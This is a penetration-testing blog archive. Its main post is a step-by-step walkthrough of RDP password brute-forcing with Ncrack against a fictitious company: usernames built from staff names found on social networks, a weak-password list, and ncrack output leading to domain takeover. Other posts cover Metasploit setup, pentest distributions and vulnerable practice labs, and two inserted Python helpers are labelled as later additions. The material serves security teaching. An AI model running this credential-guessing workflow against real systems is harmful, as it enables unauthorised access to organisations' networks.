
Remote desktop credentials audit with Ncrack

» 12 May 2011 » In Uncategorized » 10 Comments


DISCLAIMER
All information provided is for educational purposes only. It is not an endorsement to undertake hacking activity in any form (unless such activity is authorized). The tools and techniques demonstrated may be damaging if used inappropriately. All characters and data in this post are fictitious.

The Remote Desktop Protocol is often underestimated as a possible way to break into a system during a penetration test. Other services, such as SSH and VNC, are more likely to be targeted and exploited using a remote brute-force password guessing attack. For example, let’s suppose that we are in the middle of a penetration testing session at the “MEGACORP” offices and we have already tried all the available remote attacks with no luck. We also tried ARP poisoning the LAN to capture user names and passwords, without success. From a previous nmap scan log we found a few Windows machines with the RDP port open and decided to investigate this possibility further. First of all we need some valid usernames, so that we only have to guess the passwords rather than both. We found the names of the IT staff on various social networking websites. These are the key IT staff:

jessie tagle
julio feagins
hugh duchene
darmella martis
lakisha mcquain
ted restrepo
kelly missildine

It didn’t take long to create probable usernames following the common convention of the first letter of the first name followed by the entire surname.

jtagle
jfeagins
hduchene
dmartis
lmcquain
trestrepo
kmissildine

Software required:

Linux machine, preferably Ubuntu.
nmap and the terminal server client, plus the build dependencies for Ncrack:

sudo apt-get install tsclient nmap build-essential checkinstall libssl-dev libssh-dev

About Ncrack

Ncrack is a high-speed network authentication cracking tool. It was built to help companies secure their networks by proactively testing all their hosts and networking devices for poor passwords. Security professionals also rely on Ncrack when auditing their clients. Ncrack’s features include a very flexible interface granting the user full control of network operations, allowing for very sophisticated bruteforcing attacks, timing templates for ease of use, runtime interaction similar to Nmap’s and many more. Protocols supported include RDP, SSH, HTTP(S), SMB, POP3(S), VNC, FTP, and telnet. http://nmap.org/ncrack/

Installation

wget http://nmap.org/ncrack/dist/ncrack-0.4ALPHA.tar.gz
mkdir /usr/local/share/ncrack
tar -xzf ncrack-0.4ALPHA.tar.gz
cd ncrack-0.4ALPHA
./configure
make
checkinstall
dpkg -i ncrack_0.4ALPHA-1_i386.deb

Information gathering

Let’s find out which hosts in the network are up, and save them to a text list. The regular expression parses the scan output and extracts only the IP addresses.

Nmap ping scan, go no further than determining if host is online

nmap  -sP 192.168.56.0/24 | grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' > 192.168.56.0.txt

Nmap fast scan with input from list of hosts/networks

nmap -F -iL 192.168.56.0.txt


Starting Nmap 5.21 ( http://nmap.org ) at 2011-04-10 13:15 CEST

Nmap scan report for 192.168.56.10
Host is up (0.0017s latency).
Not shown: 91 closed ports
PORT     STATE SERVICE
88/tcp   open  kerberos-sec
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
389/tcp  open  ldap
445/tcp  open  microsoft-ds
1025/tcp open  NFS-or-IIS
1026/tcp open  LSA-or-nterm
1028/tcp open  unknown
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:09:F5:22 (Cadmus Computer Systems)

Nmap scan report for 192.168.56.101
Host is up (0.014s latency).
Not shown: 96 closed ports
PORT     STATE SERVICE
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-term-serv
MAC Address: 08:00:27:C1:5D:4E (Cadmus Computer Systems)

Nmap done: 55 IP addresses (55 hosts up) scanned in 98.41 seconds

From the log we can see two machines with the Microsoft terminal service port (3389) open. Looking more closely at the services available on 192.168.56.10 (Kerberos, LDAP and SMB are all exposed) we can assume that this machine might be the domain controller, and it’s worth trying to pwn it.

At this point we need to create a file (my.usr) with the probable usernames previously gathered.

vim my.usr

jtagle
jfeagins
hduchene
trestrepo
kmissildine

We also need a file (my.pwd) with the candidate passwords; common passwords and wordlists are easy to find on the internet.

vim my.pwd

somepassword
passw0rd
blahblah
12345678
iloveyou
trustno1

At this point we run Ncrack against the 192.168.56.10 machine.


ncrack -vv  -U my.usr -P my.pwd 192.168.56.10:3389,CL=1

Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'
192.168.56.10 3389/tcp rdp: 'jtagle' '12345678'
192.168.56.10 3389/tcp rdp: 'kmissildine' 'iloveyou'
192.168.56.10 3389/tcp rdp: 'trestrepo' 'trustno1'

Ncrack done: 1 service scanned in 98.00 seconds.
Probes sent: 51 | timed-out: 0 | prematurely-closed: 0

Ncrack finished.

We can see from the Ncrack results that all the user names gathered are valid, and we were also able to crack the login credentials since they were using weak passwords. Four of the IT staff have some kind of restriction on the machine; the exception is hduchene, who might be the domain administrator. Let’s find out.

Run the terminal server client from the Linux box:

tsclient 192.168.56.10

Use Hugh Duchene’s credentials ‘hduchene’ ‘passw0rd’ and BINGO !!!

At this point we have control of the entire MEGACORP domain: unlimited access to all the corporate resources related to the domain. We can add users, escalate the privileges of existing users, browse the protected network resources, install backdoors and rootkits, and much more.

Final remarks.

For the penetration testers: don’t give up at first hurdle, there’s always another way to break in :-) .

For the IT staff: the lack of a password policy enforcing complexity and strength leads to disaster.
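As an added example (not part of the original post, and not Ncrack’s own code), the following Python script turns the Ncrack transcript above into the artefact the IT staff actually need: one finding per compromised account, plus the rule of a simple password policy that each guessed password breaks. The sample output is copied from the fictitious lab transcript in the post; the policy thresholds (12 characters, at least three of four character classes) are this example’s assumptions, not values from the post or from any Windows default.

```python
"""Turn Ncrack 'Discovered credentials' lines into an audit report.

Added example: not from the original post and not part of Ncrack.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample, copied from the fictitious lab transcript in the post.
SAMPLE_NCRACK_OUTPUT = """\
Starting Ncrack 0.4ALPHA ( http://ncrack.org ) at 2011-05-10 17:24 CEST

Discovered credentials on rdp://192.168.56.10:3389 'hduchene' 'passw0rd'
rdp://192.168.56.10:3389 Account credentials are valid, however,the account is denied interactive logon.
Discovered credentials on rdp://192.168.56.10:3389 'jfeagins' 'blahblah'
Discovered credentials on rdp://192.168.56.10:3389 'jtagle' '12345678'
Discovered credentials on rdp://192.168.56.10:3389 'kmissildine' 'iloveyou'
Discovered credentials on rdp://192.168.56.10:3389 'trestrepo' 'trustno1'

rdp://192.168.56.10:3389 finished.

Discovered credentials for rdp on 192.168.56.10 3389/tcp:
192.168.56.10 3389/tcp rdp: 'hduchene' 'passw0rd'
192.168.56.10 3389/tcp rdp: 'jfeagins' 'blahblah'

Ncrack done: 1 service scanned in 98.00 seconds.
"""

# Live result line: "Discovered credentials on <service>://<host>:<port> '<user>' '<password>'"
DISCOVERED_RE = re.compile(
    r"^Discovered credentials on (?P<service>\w+)://(?P<host>[^:\s]+):(?P<port>\d+) "
    r"'(?P<user>[^']*)' '(?P<password>[^']*)'$"
)

# Assumed policy for this example; substitute the organisation's real requirements.
MIN_LENGTH = 12
MIN_CLASSES = 3
CHARACTER_CLASSES = (r"[a-z]", r"[A-Z]", r"[0-9]", r"[^a-zA-Z0-9]")


@dataclass(frozen=True)
class Finding:
    service: str
    host: str
    port: int
    user: str
    password: str


def parse_ncrack_output(text: str) -> list[Finding]:
    """One Finding per live 'Discovered credentials' line, in order, without duplicates.

    The summary block at the end repeats the same pairs in another format and is
    deliberately skipped so that each compromised account appears once.
    """
    findings: list[Finding] = []
    for line in text.splitlines():
        match = DISCOVERED_RE.match(line.strip())
        if match is None:
            continue
        finding = Finding(match["service"], match["host"], int(match["port"]),
                          match["user"], match["password"])
        if finding not in findings:
            findings.append(finding)
    return findings


def policy_failures(password: str) -> list[str]:
    """Rules of the assumed policy that the password violates (empty list = compliant)."""
    failures = []
    if len(password) < MIN_LENGTH:
        failures.append(f"shorter than {MIN_LENGTH} characters")
    classes = sum(1 for pattern in CHARACTER_CLASSES if re.search(pattern, password))
    if classes < MIN_CLASSES:
        failures.append(f"only {classes} of {len(CHARACTER_CLASSES)} character classes")
    return failures


def audit_report(text: str) -> dict[str, list[str]]:
    """Map each compromised account to the rules its password broke.

    Every account in the report needs a forced reset; the reasons show which
    policy controls would have stopped the guess in the first place.
    """
    return {f.user: policy_failures(f.password) for f in parse_ncrack_output(text)}


if __name__ == "__main__":
    for user, reasons in audit_report(SAMPLE_NCRACK_OUTPUT).items():
        print(f"{user}: force password reset ({'; '.join(reasons)})")
```

Feed it a real transcript with `python audit.py < ncrack.log` style redirection by swapping `SAMPLE_NCRACK_OUTPUT` for `sys.stdin.read()`; the parser keys on the live result lines only, so the duplicate summary block never inflates the count of affected accounts.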


Metasploit 3.7.0 and Armitage with postgresql support

» 04 May 2011 » In Uncategorized » 18 Comments

Metasploit version 3.7.0 is available for download, and this new release comes with a significant number of improvements. One of the most important updates is session management: Metasploit is now capable of handling hundreds of sessions, which comes in handy when running large-scale social engineering engagements. Along with this update, other long-awaited features have been added; pass-the-hash and stolen password attacks against Windows 2008 and NTLM authentication support in the Microsoft SQL Server driver are the most important. As a bonus, this release ships with 35 new remote exploits. Check it out.

Here you can see how to install Metasploit and Armitage from scratch with postgresql support on Ubuntu 11.04.

Metasploit installation


wget  http://updates.metasploit.com/data/releases/framework-3.7.0-linux-mini.run

install the metasploit framework

chmod +x framework-3.7.0-linux-mini.run

./framework-3.7.0-linux-mini.run --help

./framework-3.7.0-linux-mini.run

#run the metasploit update

msfupdate

Postgresql and dependencies installation


apt-get install postgresql pgadmin3 libpq-dev sun-java6-plugin ruby rubygems libreadline-dev libssl-dev libpq5 ruby-dev nmap

gem install pg

#Metasploit database and a user creation

su postgres
createuser metasploit -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n

createdb --owner=metasploit metasploit

#Run the msfconsole  and run the following commands
#msfconsole
msf> db_driver postgresql
msf> db_connect metasploit:metasploit@127.0.0.1:5432/metasploit

msfrpcd must be started:

msfrpcd -f -U metasploit -P metasploit -t Basic

And now it is time to start Armitage:

/opt/framework-3.7.0/msf3/armitage

Check that the postgresql credentials are correct, and press Connect.

User: metasploit
Password: metasploit
DB connect string: metasploit:metasploit@127.0.0.1/metasploit

In a couple of seconds Armitage should appear.

On Armitage, go to Hosts > Nmap scan > Intense Scan > Input a subnet of interest and happy hunting !

Note: in case you get the error “The address is already in use (0.0.0.0:55553)”, check which process is keeping port 55553 busy. You can do it easily by running the command lsof -i :55553.

COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
.ruby.bin 5538 root    4u  IPv4 154865      0t0  TCP *:55553 (LISTEN)

At this point you need to kill the process by its PID, in this case kill -9 5538, and restart msfrpcd with “msfrpcd -f -U metasploit -P metasploit -t Basic”.
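As an added example (not part of the original post, and not Metasploit or Armitage code), the Python below does the two checks from the note above before you start the daemon: it attempts the same bind that msfrpcd would attempt on port 55553 and reports whether it fails with “address already in use”, and it parses `lsof -i :55553` output to name the command and PID holding the port. The sample lsof output is copied from the post; `who_holds` shells out to the real `lsof` and is the only part that needs the tool installed.

```python
"""Check the msfrpcd listening port before starting the daemon.

Added example: not from the original post and not part of Metasploit or Armitage.
"""
from __future__ import annotations

import errno
import re
import socket
import subprocess

MSFRPCD_PORT = 55553  # the port reported in the post's error message

# Constructed sample, copied from the `lsof -i :55553` output shown in the post.
SAMPLE_LSOF_OUTPUT = """\
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
.ruby.bin 5538 root    4u  IPv4 154865      0t0  TCP *:55553 (LISTEN)
"""

# One lsof row: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME (LISTEN)
LSOF_LISTEN_RE = re.compile(
    r"^(?P<command>\S+)\s+(?P<pid>\d+)\s+\S+\s+\S+\s+\S+\s+\S+\s+\S+\s+\S+\s+"
    r"(?P<name>\S+)\s+\(LISTEN\)$"
)


def port_in_use(port: int, host: str = "0.0.0.0") -> bool:
    """True when bind(host, port) fails with EADDRINUSE, the exact condition that
    stops msfrpcd from starting. The probe socket is closed immediately."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as probe:
        try:
            probe.bind((host, port))
        except OSError as exc:
            if exc.errno == errno.EADDRINUSE:
                return True
            raise
    return False


def listening_pids(lsof_text: str, port: int) -> list[tuple[str, int]]:
    """(command, pid) for every LISTEN row of `lsof -i :<port>` output bound to that port."""
    holders = []
    for line in lsof_text.splitlines():
        match = LSOF_LISTEN_RE.match(line.strip())
        if match and match["name"].endswith(f":{port}"):
            holders.append((match["command"], int(match["pid"])))
    return holders


def who_holds(port: int) -> list[tuple[str, int]]:
    """Run lsof for a live port (requires lsof on the box) and parse the result."""
    result = subprocess.run(["lsof", "-i", f":{port}"], capture_output=True, text=True)
    return listening_pids(result.stdout, port)


def check_against_temporary_listener() -> tuple[bool, bool]:
    """Self-check: open a throwaway listener on a free loopback port and report
    port_in_use() while it is open and again after it has been closed."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        port = listener.getsockname()[1]
        while_open = port_in_use(port, "127.0.0.1")
    finally:
        listener.close()
    return while_open, port_in_use(port, "127.0.0.1")


if __name__ == "__main__":
    if port_in_use(MSFRPCD_PORT):
        for command, pid in who_holds(MSFRPCD_PORT):
            print(f"port {MSFRPCD_PORT} is held by {command} (pid {pid}); stop it before starting msfrpcd")
    else:
        print(f"port {MSFRPCD_PORT} is free; msfrpcd can bind it")
```

The bind probe is preferred over a connect test because it reproduces the daemon’s own failure mode: a connect would also succeed against a port owned by a different user, but only a failed bind tells you msfrpcd itself will refuse to start.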


The penetration tester bookshelf

» 01 May 2011 » In Uncategorized » 1 Comment

This is a selection of books that every pen tester or infosec person needs to have on the shelf. Other valuable books are available on the topic, but these are my favourites. A particular mention goes to the guys behind the Social Engineering Framework project and the related book, for their invaluable work on pwning humans. Happy reading and hacking!

BackTrack 4: Assuring Security by Penetration Testing

BackTrack 4: Assuring Security by Penetration Testing is a fully focused, structured book providing guidance on developing practical penetration testing skills by demonstrating the cutting-edge hacker tools and techniques in a coherent step-by-step strategy. It offers all the essential lab preparation and testing procedures to reflect real-world attack scenarios from your business perspective in today’s digital age. www.packtpub.com

Social Engineering: The Art of Human Hacking

Social Engineering: The Art of Human Hacking has been unanimously voted as the official book on social engineering. Based on the Web’s first official Framework for Social Engineers, this book delves into aspects of human thinking that have not been discussed in previous social engineering books. Many readers have stated it should be used in college as a text book on both human vulnerabilities and psychology. With in-depth discussions of body language, hand gestures, the scientific part of NLP and microexpressions, Social Engineering: The Art of Human Hacking has been dubbed a “seminal work” in the infosec community. www.social-engineer.com

 

Professional Penetration Testing: Creating and Operating a Formal Hacking Lab

Thomas Wilhelm has delivered pen testing training to countless security professionals and now through the pages of this book you can benefit from his years of experience as a professional penetration tester and educator. After reading this book you will be able to create a personal penetration test lab that can deal with real-world vulnerability scenarios.

Penetration testing is the act of testing a network to find security vulnerabilities before they are exploited by phishers, digital piracy groups, and countless other organized or individual malicious hackers. The material presented will be useful to beginners all the way through to advanced practitioners. www.syngress.com


Top penetration testing methodologies

» 28 April 2011 » In Uncategorized » No Comments

A penetration test is an evaluation method to assess the vulnerabilities of computers, systems or networks and exploit them in order to measure the impact of the flaws on the system under test. Different testing frameworks and methodologies exist to help infosec people choose the best strategy to conduct a successful penetration test. Here is a list of the most widely used methodologies. Enjoy !!!

ISSAF

The ISSAF is OISSG’s flagship project. It is an effort to develop an end-to-end framework for security assessment. The ISSAF aims to provide a single point of reference for professionals involved in security assessment; it reflects and addresses the practical issues of security assessment. The penetration testing framework.

 

OSSTMM – Open Source Security Testing Methodology Manual

The Open Source Security Testing Methodology Manual (OSSTMM) is a peer-reviewed methodology for performing security tests and metrics. The OSSTMM test cases are divided into five channels (sections) which collectively test: information and data controls, personnel security awareness levels, fraud and social engineering control levels, computer and telecommunications networks, wireless devices, mobile devices, physical security access controls, security processes, and physical locations such as buildings, perimeters, and military bases. OSSTMM web page.

 

OWASP

The Open Web Application Security Project (OWASP) is an open-source application security project. The OWASP community includes corporations, educational organizations, and individuals from around the world. This community works to create freely-available articles, methodologies, documentation, tools, and technologies. OWASP web page.


Updating to Social-Engineer Toolkit 1.3

» 01 April 2011 » In Uncategorized » No Comments

Just a few hours ago a new version of The Social-Engineer Toolkit (SET) was released. This version is called “Artillery Edition”, and some of the major changes are a completely custom interactive SET shell and RATTE, an HTTP-tunneling Blowfish-encrypted payload. There is also a new attack vector, the wireless attack vector, which will set up a rogue access point, spoof DNS, and launch the different SET attack vectors. If you are using SET from BackTrack, you can upgrade it by following these few steps.

Log in to Backtrack:


#cd /pentest/exploits/SET/

#./set-update

Please wait until the update is finished, and run

#./set

Have fun!!!

Linux Penetration Testing distributions list

» 30 November 2010 » In Uncategorized » 1 Comment

Linux is widely used in many areas and applications; one of those is security, specifically penetration testing and network/system assessment. Along with its robustness and stability, the easy customization of the system allows the creation of custom-made distributions with one’s favourite security tools. I hope this list is useful for finding your security Linux distribution (thanks to www.pentestit.com for some links). If your preferred pentest/security Linux distribution isn’t listed, please contact me.

NodeZero
NodeZero is Ubuntu based linux designed as a complete system which can also be used for penetration testing. NodeZero uses Ubuntu repositories so your system will be always up to date. The system setup is basic and it’s primarly designed for disk installation and customization as you want. With NodeZero comes around 300 tools for penetration testing and set of basic services which are needed in penetration testing. Also we are preparing a repository of pentest tools so your system will be up to date at all time. http://netinfinity.org

backtrack-linux
backtrack-linux.org, is the highest rated and acclaimed Linux security distribution to date. BackTrack is a Linux-based penetration testing arsenal that aids security professionals in the ability to perform assessments in a purely native environment dedicated to hacking. Regardless if you’re making BackTrack your primary operating system, booting from a LiveDVD, or using your favorite thumbdrive, BackTrack has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester. www.backtrack-linux.org

gnacktrack
GnackTrack is a Live (and installable) Linux distribution designed for Penetration Testing and is based on Ubuntu. Although this sounds like BackTrack, it is most certainly not; it’s very similar but based on the much loved GNOME! www.gnacktrack.co.uk


Samurai Web Testing Framework
The Samurai Web Testing Framework is a live Linux environment that has been pre-configured to function as a web pen-testing environment. The CD contains the best of the open source and free tools that focus on testing and attacking websites. In developing this environment, we have based our tool selection on the tools we use in our security practice. We have included the tools used in all four steps of a web pen-test. Starting with reconnaissance, we have included tools such as the Fierce domain scanner and Maltego. For mapping, we have included tools such as WebScarab and ratproxy. We then chose tools for discovery. These would include w3af and burp. For exploitation, the final stage, we included BeEF, AJAXShell and much more. This CD also includes a pre-configured wiki, set up to be the central information store during your pen-test.
samurai.inguardians.com

Live Hacking CD
Live Hacking CD is a new Linux distribution packed with tools and utilities for ethical hacking, penetration testing and countermeasure verification. Based on Ubuntu, this “Live CD” runs directly from the CD and doesn’t require installation on your hard drive. Once booted you can use the included tools to test, check, ethically hack and perform penetration tests on your own network to make sure that it is secure from outside intruders. www.livehacking.com/live-hacking-cd

Network Security Toolkit
It is a bootable ISO live CD/DVD (NST Live) based on Fedora. The toolkit was designed to provide easy access to best-of-breed Open Source Network Security Applications and should run on most x86/x86_64 platforms. http://www.networksecuritytoolkit.org/nst/

Pentoo
Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit livecd. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment.
http://www.pentoo.ch

OWASP Live CD
OWASP Live CD is a project that collects some of the best open source security projects in a single CD. Web developers, testers and security professionals can boot from this Live CD and have access to a full security testing suite. This allows its users to test for various security issues in web applications and web sites. http://appseclive.org

Arudius
Arudius is a Linux live CD with tools for penetration testing and vulnerability analysis. A so-called “Linux live CD” is essentially a Linux operating system that is bootstrapped and run directly from a standard CD-ROM. This allows for improved portability of the operating system and for running a variety of Linux software on almost any physical system without affecting the host operating system installed on the hard disk. This is the concept that Arudius exploits as well. Currently, Arudius features more than 140 different security tools and packages. www.tdisecurity.com/tdi-labs/arudius.htm

WeakNet
WeakNet Linux is designed primarily for penetration testing, forensic analysis and other security tasks. The default desktop environment is GNOME. http://weaknetlabs.com/main/

BackBox
BackBox is a Linux distribution based on Ubuntu Lucid 10.04 LTS developed to perform penetration tests and security assessments. It is designed to be fast, easy to use and to provide a minimal yet complete desktop environment, thanks to its own software repositories, always updated to the latest stable version of the most known and used ethical hacking tools. www.backbox.org/public/

Matriux
Matriux is a fully featured security distribution consisting of a bunch of powerful, open source and free tools that can be used for various purposes including, but not limited to, penetration testing, ethical hacking, system and network administration, cyber forensics investigations, security testing, vulnerability analysis, and much more. It is a distribution designed for security enthusiasts and professionals, although it can be used normally as your default desktop system. With Matriux, you can turn any system into a powerful penetration testing toolkit, without having to install any software onto your hard disk. Matriux is designed to run from a Live environment like a CD / DVD or USB stick, or it can easily be installed to your hard disk in a few steps. Matriux also includes a set of computer forensics and data recovery tools that can be used for forensic analysis and investigations and data retrieval. http://www.matriux.com

Secmic
Secmic is a live Linux security distribution that may be used by security professionals or for educational purposes. It is free to download, and always will be. It comprises over 200 security oriented open source applications and maintains Ubuntu/Kubuntu update compatibility; meaning you will be able to receive security updates directly from the Ubuntu/Kubuntu repositories. b43 / wl hybrid compatibility is included with this Remastersys backup. http://sourceforge.net/p/secmic/home//index.html

Security tools distribution
STD is a Linux-based Security Tool. Actually, it is a collection of hundreds if not thousands of open source security tools. It’s a Live Linux Distro, which means it runs from a bootable CD in memory without changing the native operating system of the host computer. Its sole purpose in life is to put as many security tools at your disposal with as slick an interface as it can.  http://s-t-d.org

NetSecL
NetSecL Linux comes by default with a hardened configuration, leaving the distribution at a security level where it is still usable and providing the tools needed to test your security. GrSecurity and its firewall are features that make the distribution unique, along with specially compiled packages: Amap, Ettercap, Hydra, Kismet, Nessus, Nmap, Metasploit, PADS.
http://netsecl.linuxfreedom.com

VAST
VAST is a VIPER Lab live distribution that contains VIPER developed tools such as UCsniff, videojak, videosnarf and more. Along with VIPER tools and other essential VoIP security tools, it also contains tools penetration testers utilize such as Metasploit, Nmap, and Hydra. This distribution is a work in progress. If you would like to see a tool or package included please feel free to suggest them and I will do what I can to make it happen. http://vipervast.sourceforge.net

Blackbuntu CE 0.1
Linux Penetration Testing Tools Box Based on Ubuntu 10.10 which was specially designed for security training students and practitioners of information security. www.blackbuntu.com

Katana
Katana is a portable multi-boot security suite which brings together many of today’s best security distributions and portable applications to run off a single Flash Drive. It includes distributions which focus on Pen-Testing, Auditing, Forensics, System Recovery, Network Analysis, and Malware Removal. Katana also comes with over 100 portable Windows applications; such as Wireshark, Metasploit, NMAP, Cain & Able, and many more. www.hackfromacave.com/katana.html


Pentest lab vulnerable servers-applications list

» 14 September 2010 » In Uncategorized » 10 Comments


In this post I’m going to present some useful resources for learning about penetration testing and where to use exploitation tools and techniques in a safe and legal environment. This list contains a set of deliberately insecure LiveCDs, virtual machines and applications designed to be used as targets for enumeration, web exploitation, password cracking and reverse engineering.

If you have other links/distribution/virtual machines, please leave a comment.

List updated on 13/9/2011

UltimateLAMP

UltimateLAMP is an Ubuntu VM running vulnerable services and containing weak accounts.

The UltimateLAMP VM runs the following services: Postfix, Apache, MySQL, WordPress, TextPattern, Serendipity, MediaWiki, TikiWiki, PHP, Gallery, Moodle, PHPWebSite, Joomla, eGroupWare, Drupal, Php Bulletin Board, Sugar CRM, Owl, WebCalendar, Dot project, PhpAdsNew, Bugzilla, OsCommerce, ZenCart, PhpMyAdmin, Webmin, Mutillidae 1.5 (OWASP Top 10 Vulns)

UltimateLAMP download

webgoat

WebGoat is a deliberately insecure J2EE web application maintained by OWASP designed to teach web application security lessons. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat application. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application is a realistic teaching environment, providing users with hints and code to further explain the lesson.

http://www.owasp.org

Holynix
Similar to the de-ice Cd’s and pWnOS, holynix is an ubuntu server vmware image that was deliberately built to have security holes for the purposes of penetration testing. More of an obstacle course than a real world example.
http://pynstrom.net/index.php?page=holynix.php

WackoPicko

WackoPicko is a website that contains known vulnerabilities. It was first used for the paper Why Johnny Can’t Pentest: An Analysis of Black-box Web Vulnerability Scanners found: http://cs.ucsb.edu/~adoupe/static/black-box-scanners-dimva2010.pdf

https://github.com/adamdoupe/WackoPicko

De-ICE PenTest LiveCDs
The PenTest LiveCDs are the creation of Thomas Wilhelm, who was transferred to a penetration test team at the company he worked for. Needing to learn as much about penetration testing as quickly as possible, Thomas began looking for both tools and targets. He found a number of tools, but no usable targets to practice against. Eventually, in an attempt to narrow the learning gap, Thomas created PenTest scenarios using LiveCDs.
http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Metasploitable

Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql.
http://blog.metasploit.com/2010/05/introducing-metasploitable.html

Owaspbwa
Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications.
http://code.google.com/p/owaspbwa/

Web Security Dojo
A free open-source self-contained training environment for Web Application Security penetration testing. Tools + Targets = Dojo
http://www.mavensecurity.com/web_security_dojo/

Lampsecurity
LAMPSecurity training is designed to be a series of vulnerable virtual machine images along with complementary documentation designed to teach Linux, Apache, PHP and MySQL security.
http://sourceforge.net/projects/lampsecurity/files/

Damn Vulnerable Web App (DVWA)
Damn Vulnerable Web App is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.
www.dvwa.co.uk

Hacking-Lab
This is the Hacking-Lab LiveCD project. It is currently in beta stadium. The live-cd is a standardized client environment for solving our Hacking-Lab wargame challenges from remote.
http://www.hacking-lab.com/hl_livecd/

Moth
Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
http://www.bonsai-sec.com/en/research/moth.php

Exploit kb vulnerable web app
exploit.co.il Vulnerable Web App is designed as a learning platform to test various SQL injection techniques. This is a fully functional web site with a content management system based on FCKeditor. You can download it as source code or pre-configured.
http://sourceforge.net/projects/exploitcoilvuln/

Gruyere

This codelab shows how web application vulnerabilities can be exploited and how to defend against these attacks. The best way to learn things is by doing, so you’ll get a chance to do some real penetration testing, actually exploiting a real application. Specifically, you’ll learn the following:
How an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). How to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution. To get the most out of this lab, you should have some familiarity with how a web application works (e.g., general knowledge of HTML, templates, cookies, AJAX, etc.).

http://google-gruyere.appspot.com/

Damn Vulnerable Linux (DVL)
Damn Vulnerable Linux  is everything a good Linux distribution isn’t. Its developers have spent hours stuffing it with broken, ill-configured, outdated, and exploitable software that makes it vulnerable to attacks. DVL isn’t built to run on your desktop – it’s a learning tool for security students.
http://www.damnvulnerablelinux.org

pWnOS
pWnOS is a “VM image” that creates a target on which to practice penetration testing; the “end goal” is to get root. It was designed to practice using exploits, with multiple entry points.

http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html

http://www.krash.in/bond00/pWnOS%20v1.0.zip

Virtual Hacking Lab
A mirror of deliberately insecure applications and old software with known vulnerabilities. Used for proof-of-concept / security training / learning purposes. Available as virtual images, live ISOs or standalone formats.
http://sourceforge.net/projects/virtualhacking/files/

Badstore
Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure.
http://www.badstore.net/

BodgeIt Store

The BodgeIt Store is a vulnerable web application which is currently aimed at people who are new to pen testing.

http://code.google.com/p/bodgeit/

Hackademic Challenges

The OWASP Hackademic Challenges , is an open source project that can be used to test and improve one’s knowledge of information system and web application security. The OWASP Hackademic Challenges implement realistic scenarios with known vulnerabilities in a safe, controllable environment. Users can attempt to discover and exploit these vulnerabilities in order to learn important concepts of information security through the attacker’s perspective.

www.hackademic.eu

OWASP Vicnum Project

A flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’ . Play the game at http://vicnum.ciphertechs.com

https://sourceforge.net/projects/vicnum/

Stanford SecuriBench

Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.

http://suif.stanford.edu/~livshits/securibench/

Kioptrix

These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player).
The purpose of these games is to learn the basic tools and techniques of vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.

http://www.kioptrix.com/blog/?page_id=135

hackxor

Hackxor is a webapp hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism & difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc.

http://hackxor.sourceforge.net


Fast-Track 4.0 and Ubuntu 10.04

» 30 June 2010 » In Uncategorized » No Comments

